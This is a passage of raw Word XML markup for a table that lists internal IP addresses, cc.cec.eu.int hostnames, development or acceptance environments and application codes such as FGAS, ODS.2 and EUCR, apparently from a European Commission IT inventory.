            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>FGAS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="620D72B3" w14:textId="77777777" w:rsidTr="00266236">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="794" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6FB840F3" w14:textId="4A870106" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.180.135</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0AA0A5B0" w14:textId="6A93801A" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd03818.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="448" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="50010AB5" w14:textId="06039E11"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53049D51" w14:textId="78FCCF8B" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>Acceptance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="731404EA" w14:textId="110FE635" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>ODS.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="3769845E" w14:textId="77777777" w:rsidTr="00266236">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="794" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="38F63A3C" w14:textId="3F8ED2FE" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.141.218</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5924D747" w14:textId="109BB82B" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd01771.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="448" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7563A392" w14:textId="131CC88E"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0A86FDA5" w14:textId="7EF2600E" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>Development</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="77BD621A" w14:textId="672763B4" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>CH-TI</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="40FD3A77" w14:textId="77777777" w:rsidTr="00266236">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="794" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6607ECFA" w14:textId="54C87E3A" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.141.66</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="591B2310" w14:textId="410BDCFC" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd02776.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="448" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="011CFA67" w14:textId="75A5825C"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4FBEEFDF" w14:textId="7BDC6048" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>Development</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6B052F87" w14:textId="0DC1FBD3" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>FGAS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="09DDF688" w14:textId="77777777" w:rsidTr="00266236">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="794" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4DB8BAC6" w14:textId="57EEB568" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.181.129</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="42E22C13" w14:textId="01B1CAE4" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd03815.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="448" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="79C1AF30" w14:textId="3AC7594A"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166ABFEC" w14:textId="3A4480EC" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>Development</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="18518166" w14:textId="771EE84D" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>ODS.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="57424DCD" w14:textId="77777777" w:rsidTr="00266236">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="794" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="23477608" w14:textId="09420BDF" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.176.116</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0787D458" w14:textId="11593E8C" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd03088.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="448" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="00E9F9BB" w14:textId="3C857BF2" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>CLIMA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="787" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2B1E3288" w14:textId="1B7E9EB4" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>Development</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="40855CB4" w14:textId="4F971BAA" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>EUCR</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="7071952C" w14:textId="77777777" w:rsidTr="00266236">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="794" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6BAF8CD9" w14:textId="5074A781"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10.130.137.147</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="48BB42C3" w14:textId="264AD6B5"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wlstd02057.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="448" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="52FD1C43" w14:textId="201BA53D"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533225FB" w14:textId="5F9ED393" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>Development</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="45E800C0" w14:textId="6B279401"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="004289C0" w14:textId="77777777" w:rsidTr="00266236">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="794" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="73F265EB" w14:textId="13AB33E3"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10.130.142.187</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="353CCC54" w14:textId="29F25A98"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wlstd01754.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="448" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="787771FA" w14:textId="518A33DE"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195C7E41" w14:textId="3DF4B5F9" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>Development</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0C6455F7" w14:textId="6FF5E1A1" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>CH-TI.CHL-VALIDATION</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="45EA0C0A" w14:textId="77777777" w:rsidTr="00266236">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="794" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="39AFA5FC" w14:textId="3EDCA42A"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10.130.177.142</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="227F785C" w14:textId="3192B281"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wlstd03452.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="448" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0F3923A9" w14:textId="63D6D122"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1E19D3C0" w14:textId="4321F020" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>Development</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5FDD3FEB" w14:textId="0805CF40"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EUCR.SD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="09D3662A" w14:textId="77777777" w:rsidTr="00266236">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="794" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="04EE5283" w14:textId="0E030817"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10.130.176.152</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="45E01F97" w14:textId="255A21FD"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wlstd03451.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="448" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4228BFF1" w14:textId="0DD6B344"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30586375" w14:textId="00A7EEB4" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>Development</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="49EC505A" w14:textId="457D2F4E"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EUCR.SD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="5DAB370B" w14:textId="77777777" w:rsidTr="00266236">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="794" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6C4B2105" w14:textId="0C6B8255"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10.130.136.163</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="193EA98A" w14:textId="1373A87C"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wlstd11760.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="448" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="13FADC31" w14:textId="571359F6"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19DDFB1A" w14:textId="1C6F260F"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73F6C9DE" w14:textId="6F13D24E" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>CH-TI</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="4BE5C73C" w14:textId="77777777" w:rsidTr="00266236">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="794" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="40B241F6" w14:textId="49193871"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10.130.180.166</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="11995FD3" w14:textId="67971340"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wlstd03831.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="448" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="43FDD2E1" w14:textId="29CA740A"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7B8FE889" w14:textId="56D26BCA"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5AD8D810" w14:textId="617DFB26" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>FGAS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="0760AA3D" w14:textId="77777777" w:rsidTr="00266236">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="794" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="58F9657A" w14:textId="226F8BB4"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10.130.180.165</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="72B6ED3B" w14:textId="2C4F2BF1"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wlstd03829.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="448" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6EB7F08F" w14:textId="74559530"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21948F2B" w14:textId="12494E13"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5B4529C7" w14:textId="2144D74A" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>ODS.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="7A70AB69" w14:textId="77777777" w:rsidTr="00266236">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
